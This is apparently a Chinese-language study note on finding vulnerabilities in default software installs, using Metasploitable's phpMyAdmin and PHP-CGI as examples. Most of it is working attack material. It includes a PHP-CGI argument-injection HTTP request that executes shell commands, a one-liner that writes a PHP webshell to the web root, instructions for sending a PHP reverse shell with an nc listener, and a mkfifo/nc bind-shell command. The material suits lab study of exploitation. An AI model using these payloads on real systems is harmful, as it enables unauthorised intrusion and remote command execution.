手动漏洞挖掘.默认安装

手动漏洞挖掘-默认安装

  • Windows默认安装漏洞

  • phpMyAdmin/setup

    • MetaSploitable
      1
      2
      3
      4
      5
      6
      7
      8
      POST http:///phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1
      Host: 192.168.20.10
      Content-Length: 40

      <?php
      passthru('pwd&&ls');
      die();
      ?>
    • 写入webshell
1
echo"<?php\$cmd=\$_GET["cmd"];system(\$cmd);?>">/var/www/3.php
  • PHP反弹shell

    • /usr/share/webshells/php/php-reverse-shell.php
    • 直接把内容用burp发送,然后在本地用nc侦听,记得修改php文件里面的ip地址
  • 侦听shell

1
echo system('mkfifo /tmp/pipe;sh /tmp/pipe|nc -nlp 4444 > /tmp/pipe');
  • File

    • 如果当前用户没有权限执行ifconfig,先用whereis 查看ifconfig的路径,然后到目录下使用./执行。
  • Ubuntu/Debian默认安装PHP5-cgi

  • 可直接访问/cgi-bin/php5和/cgi-bin/php(爬不出来的目录

总结

思路:先检查默认安装的软件是否有相关漏洞